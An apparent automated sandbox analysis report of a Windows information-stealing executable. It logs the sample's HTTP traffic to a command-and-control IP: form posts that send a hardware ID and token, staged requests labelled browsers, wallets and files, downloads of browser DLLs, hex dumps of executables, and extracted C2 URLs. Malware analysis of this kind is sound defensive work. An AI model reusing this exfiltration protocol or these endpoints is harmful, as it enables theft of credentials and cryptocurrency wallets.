74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 
00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:17 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 
00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:18 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 
61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 45.200.148.113 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJE Host: 45.200.148.113 Content-Length: 209 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GHJDBAKEHDHDGCAKKJJE Content-Disposition: form-data; name="hwid" DB949A09E4122040409402 ------GHJDBAKEHDHDGCAKKJJE Content-Disposition: form-data; name="build" A1 ------GHJDBAKEHDHDGCAKKJJE--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGH Host: 45.200.148.113 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------IIIDAKJDHJKFHIEBFCGH Content-Disposition: form-data; name="token" 85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310 ------IIIDAKJDHJKFHIEBFCGH Content-Disposition: form-data; name="message" browsers ------IIIDAKJDHJKFHIEBFCGH--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE Host: 45.200.148.113 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------EGCBFIEHIEGCAAAKKKKE Content-Disposition: form-data; name="token" 85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310 ------EGCBFIEHIEGCAAAKKKKE Content-Disposition: form-data; name="message" plugins ------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHC Host: 45.200.148.113 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------FCFBAKJDBKJJKFIDBGHC Content-Disposition: form-data; name="token" 85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310 ------FCFBAKJDBKJJKFIDBGHC Content-Disposition: form-data; name="message" fplugins ------FCFBAKJDBKJJKFIDBGHC--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF Host: 45.200.148.113 Content-Length: 6627 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/sqlite3.dll HTTP/1.1 Host: 45.200.148.113 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKK Host: 45.200.148.113 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJ Host: 45.200.148.113 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEGIIECGHCBFHJKEHDB Host: 45.200.148.113 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------DAEGIIECGHCBFHJKEHDB Content-Disposition: form-data; name="token" 85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310 ------DAEGIIECGHCBFHJKEHDB Content-Disposition: form-data; name="file_name" c21qbGxteW1sYnpxLnB3ZA== ------DAEGIIECGHCBFHJKEHDB Content-Disposition: form-data; name="file" ------DAEGIIECGHCBFHJKEHDB--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH Host: 45.200.148.113 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------IDBKKKKKFBGDGDHIDBGH Content-Disposition: form-data; name="token" 85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310 ------IDBKKKKKFBGDGDHIDBGH Content-Disposition: form-data; name="file_name" c21qbGxteW1sYnpxLnB3ZA== ------IDBKKKKKFBGDGDHIDBGH Content-Disposition: form-data; name="file" ------IDBKKKKKFBGDGDHIDBGH--
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/freebl3.dll HTTP/1.1 Host: 45.200.148.113 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/mozglue.dll HTTP/1.1 Host: 45.200.148.113 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/msvcp140.dll HTTP/1.1 Host: 45.200.148.113 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/nss3.dll HTTP/1.1 Host: 45.200.148.113 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/softokn3.dll HTTP/1.1 Host: 45.200.148.113 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/vcruntime140.dll HTTP/1.1 Host: 45.200.148.113 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB Host: 45.200.148.113 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIEC Host: 45.200.148.113 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GIECFIEGDBKJKFIDHIEC Content-Disposition: form-data; name="token" 85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310 ------GIECFIEGDBKJKFIDHIEC Content-Disposition: form-data; name="message" wallets ------GIECFIEGDBKJKFIDHIEC--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCB Host: 45.200.148.113 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GHCGDAFCFHIDBGDHCFCB Content-Disposition: form-data; name="token" 85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310 ------GHCGDAFCFHIDBGDHCFCB Content-Disposition: form-data; name="message" files ------GHCGDAFCFHIDBGDHCFCB--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI Host: 45.200.148.113 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------BAKFCBFHJDHJKECAKEHI Content-Disposition: form-data; name="token" 85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310 ------BAKFCBFHJDHJKECAKEHI Content-Disposition: form-data; name="file_name" c3RlYW1fdG9rZW5zLnR4dA== ------BAKFCBFHJDHJKECAKEHI Content-Disposition: form-data; name="file" ------BAKFCBFHJDHJKECAKEHI--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ Host: 45.200.148.113 Content-Length: 113555 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBG Host: 45.200.148.113 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GDGIJECGDGCBKECAKFBG Content-Disposition: form-data; name="token" 85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310 ------GDGIJECGDGCBKECAKFBG Content-Disposition: form-data; name="message" ybncbhylepme ------GDGIJECGDGCBKECAKFBG--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGH Host: 45.200.148.113 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------IIIDAKJDHJKFHIEBFCGH Content-Disposition: form-data; name="token" 85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310 ------IIIDAKJDHJKFHIEBFCGH Content-Disposition: form-data; name="message" wkkjqaiaxkhb ------IIIDAKJDHJKFHIEBFCGH--
Source: Joe Sandbox View ASN Name: Africa-on-Cloud-ASZA Africa-on-Cloud-ASZA
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49732 -> 45.200.148.113:80
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.113
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7ACC60 PR_Recv, 0_2_6C7ACC60
Source: unknown HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJE Host: 45.200.148.113 Content-Length: 209 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GHJDBAKEHDHDGCAKKJJE Content-Disposition: form-data; name="hwid" DB949A09E4122040409402 ------GHJDBAKEHDHDGCAKKJJE Content-Disposition: form-data; name="build" A1 ------GHJDBAKEHDHDGCAKKJJE--
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D51000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003EE4000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003EE4000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.php
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.php)
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.php-
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.php1
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.php=
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phpBGCFIEHCFIDGCAAFB
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phpE
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phpO
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phpa
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phpdll
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phpem
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phpm
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phpnomi
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phpp
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phpq
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phpser
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003EE4000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phption:
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/0a616124ff2f2b69.phpus.wallet
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/freebl3.dll
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/mozglue.dll
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/msvcp140.dll
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/nss3.dll
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/nss3.dll(
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/nss3.dll4
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/softokn3.dll
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/softokn3.dllB
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/softokn3.dllb
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/sqlite3.dll
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/vcruntime140.dll
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/vcruntime140.dll1
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/2a5dc88bed850cdd/vcruntime140.dll8bed850cdd/nss3.dll
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/7
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/X
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113/fmw
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003EE4000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.113DHJJ
Source: 4c469e2cf403fea6249e835ddce23de2.exe, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
